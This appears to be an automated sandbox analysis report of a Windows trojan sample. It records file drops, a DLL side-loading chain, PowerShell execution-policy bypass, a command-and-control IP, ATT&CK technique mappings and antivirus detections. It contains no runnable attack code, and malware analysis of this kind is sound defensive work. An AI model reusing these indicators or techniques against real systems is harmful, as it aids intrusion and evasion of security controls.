Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00404FAA KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Replication Through Removable Media
1
Windows Management Instrumentation
1
Scripting
11
Process Injection
1
Masquerading
2
Input Capture
1
System Time Discovery
Remote Services2
Input Capture
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory11
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Obfuscated Files or Information
Cached Domain Credentials11
Peripheral Device Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc Filesystem37
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579418 Sample: Fqae7BLq4m.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 88 60 Suricata IDS alerts for network traffic 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 4 other signatures 2->66 9 Fqae7BLq4m.exe 9 2->9         started        process3 file4 50 C:\Users\Public\...\Firefox Setup 132.0.2.exe, PE32 9->50 dropped 52 C:\Users\Public\Bilite\Axialis\libcurl.dll, PE32 9->52 dropped 54 C:\Users\Public\Bilite\...\RuntimeBrokers.exe, PE32 9->54 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 68 Bypasses PowerShell execution policy 12->68 15 RuntimeBrokers.exe 3 18 12->15         started        19 conhost.exe 12->19         started        process7 dnsIp8 56 43.250.172.42, 17091, 17092, 18852 VPSQUANUS China 15->56 44 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->44 dropped 46 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->46 dropped 48 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->48 dropped 21 cmd.exe 1 15->21         started        23 cmd.exe 1 15->23         started        25 cmd.exe 1 15->25         started        file9 process10 process11 27 conhost.exe 21->27         started        29 tasklist.exe 1 21->29         started        31 findstr.exe 1 21->31         started        42 35 other processes 21->42 33 powershell.exe 1 23 23->33         started        36 conhost.exe 23->36         started        38 powershell.exe 39 25->38         started        40 conhost.exe 25->40         started        signatures12 58 Loading BitLocker PowerShell Module 38->58

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Fqae7BLq4m.exe42%ReversingLabsWin32.Trojan.DllHijack
Fqae7BLq4m.exe19%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\backup.dll42%ReversingLabsWin32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe5%ReversingLabs
C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe5%ReversingLabs
C:\Users\Public\Bilite\Axialis\libcurl.dll42%ReversingLabsWin32.Trojan.DllHijack
C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://pesterbdd.com/images/Pester.png4powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
    unknown
    http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.logRuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpfalse
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://sectigo.com/CPS0RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
          high
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
            high
            http://ocsp.sectigo.com0RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.microsoft.opowershell.exe, 0000000E.00000002.201214927053.0000000007114000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://contoso.com/Licensepowershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModuleRuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpfalse
                            unknown
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
                              high
                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
                                      high
                                      https://github.com/Pester/Pester4powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yRuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
                                          high
                                          https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
